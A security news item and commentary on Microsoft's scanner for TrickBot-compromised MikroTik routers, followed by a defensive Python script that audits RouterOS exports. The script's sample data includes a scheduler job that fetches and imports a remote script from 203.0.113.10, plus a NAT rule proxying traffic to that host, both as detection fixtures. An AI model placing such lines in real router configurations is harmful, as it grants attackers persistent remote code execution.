Microsoft Releases Scanner to Detect TrickBot-Infected Devices
In a blog post, the Microsoft Defender for IoT research team shares its analysis of how compromised MikroTik routers are used in TrickBot's command-and-control (C2) framework. Alongside the analysis, Microsoft has published a free forensic tool that checks a MikroTik device for signs of TrickBot infection.
Great work by Microsoft. But a bit sad that this didn't come from MikroTik. Like many similar devices, MikroTik routers have had their share of vulnerabilities (or just simple misconfigurations) in the past. But vendors need to step up and provide users with tools to avoid and detect configuration errors and compromise. This could start with a simple standardized API to request firmware versions for easier vulnerability scanning (and an API to find the most recent version easily). Currently, scripts to accomplish this often have to scrape data from ever-changing web pages. (Prove me wrong and let me know of vendors doing this well.)
It still blows my mind when looking at all the cool cyber research Microsoft is publishing, including free tools for prevention and detection. If you have any MikroTik devices, you need to read this. Essentially, the TrickBot malware is using the routers as a proxy on a non-standard port to access their C2 servers. It then adds a persistence layer which obfuscates malicious IPs to avoid many detection systems. Make sure that you have changed default passwords on your MikroTik devices, use good passphrases (ideally checked against data breaches), and keep the firmware updated. Only allow management from authorized systems, making sure you restrict access to ports 8291 and 22. Grab the forensic tool and cross-check your devices for any areas of concern.
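The comment above names three things to look for on a MikroTik router: a NAT rule that makes the router forward inbound connections to an outside host (the proxy), a scheduled job that pulls and runs something from a remote URL (persistence), and the management ports 8291 (Winbox) and 22 (SSH) accepted from any source. The following Python script is an added example, not the page's content, the editors' words, or Microsoft's tool: it audits a RouterOS `/export` dump for those three conditions. The sample export is constructed, and the heuristics (a `dst-nat` target outside RFC 1918 space, a scheduler `on-event` containing `fetch`, an `input` accept for 22/8291 with no `src-address` or `src-address-list`) are this example's own assumptions, not a description of TrickBot's actual rules.

```python
"""Heuristic audit of a RouterOS '/export' dump (added example, not Microsoft's
tool). Flags: dst-nat to a non-RFC1918 host (router used as proxy), scheduler
jobs that fetch remote content (persistence), and management ports 22/8291
accepted on the input chain without a source restriction."""
import ipaddress
import re

MGMT_PORTS = {22, 8291}                      # SSH and Winbox
# Assumption for this example: anything outside RFC 1918 counts as "outside".
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KV_RE = re.compile(r'([\w.-]+)=("[^"]*"|\S+)')   # key=value or key="quoted value"

# Constructed sample: a sane baseline plus three lines a reviewer should notice.
# Backslash line continuations mimic the format RouterOS itself emits.
SAMPLE_EXPORT = """\
/ip firewall filter
add action=accept chain=input dst-port=8291 protocol=tcp src-address-list=admins
add action=accept chain=input dst-port=22 protocol=tcp
add action=drop chain=input
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=4443 protocol=tcp \\
    to-addresses=203.0.113.10 to-ports=443
add action=dst-nat chain=dstnat dst-port=8080 protocol=tcp \\
    to-addresses=192.168.88.20 to-ports=80
/system scheduler
add interval=1d name=backup on-event="/system backup save name=nightly"
add interval=10m name=upd \\
    on-event="/tool fetch url=http://203.0.113.10/x.rsc dst-path=x.rsc; /import x.rsc"
"""


def parse_export(text):
    """Return a list of (section, {key: value}) for every 'add' line,
    after joining RouterOS backslash continuations into single lines."""
    joined = re.sub(r"\\\n\s*", " ", text)
    section, rules = "", []
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):                 # section header, e.g. /ip firewall nat
            section = line
        elif line.startswith("add "):
            rules.append((section, {k: v.strip('"') for k, v in KV_RE.findall(line[4:])}))
    return rules


def _ports(spec):
    """Expand a RouterOS port spec like '22,8000-8100' into a set of ints."""
    out = set()
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        out.update(range(int(lo), int(hi or lo) + 1))
    return out


def _is_lan(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False                              # not a plain address: treat as suspicious
    return any(ip in net for net in LAN_NETS)


def audit(text):
    """Return a list of (finding_kind, detail) tuples for the given export."""
    findings = []
    for section, r in parse_export(text):
        if section == "/ip firewall nat" and r.get("action") in ("dst-nat", "netmap"):
            # First address of a possible range, e.g. '203.0.113.10-203.0.113.20'
            target = r.get("to-addresses", "").split("-")[0]
            if target and not _is_lan(target):
                findings.append(("proxy-nat",
                                 f"dst-port {r.get('dst-port')} forwarded to outside host "
                                 f"{target}:{r.get('to-ports', '?')}"))
        elif section == "/ip firewall filter" and r.get("chain") == "input" and r.get("action") == "accept":
            exposed = _ports(r["dst-port"]) & MGMT_PORTS if r.get("dst-port") else set()
            if exposed and not (r.get("src-address") or r.get("src-address-list")):
                findings.append(("open-mgmt-port",
                                 f"port(s) {sorted(exposed)} accepted from any source"))
        elif section == "/system scheduler" and "fetch" in r.get("on-event", "").lower():
            findings.append(("fetch-scheduler",
                             f"job '{r.get('name')}' every {r.get('interval')} runs: {r['on-event']}"))
    return findings


if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_EXPORT):
        print(f"[{kind}] {detail}")
```

Run against a real device with `/export` output saved to a file and passed to `audit()`; the 8080 rule to 192.168.88.20 is deliberately left unflagged because a port-forward to a LAN host is normal, which is why the check keys on the destination being outside the LAN rather than on the port number.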
Read more in
Bleeping Computer: Microsoft creates tool to scan MikroTik routers for TrickBot infections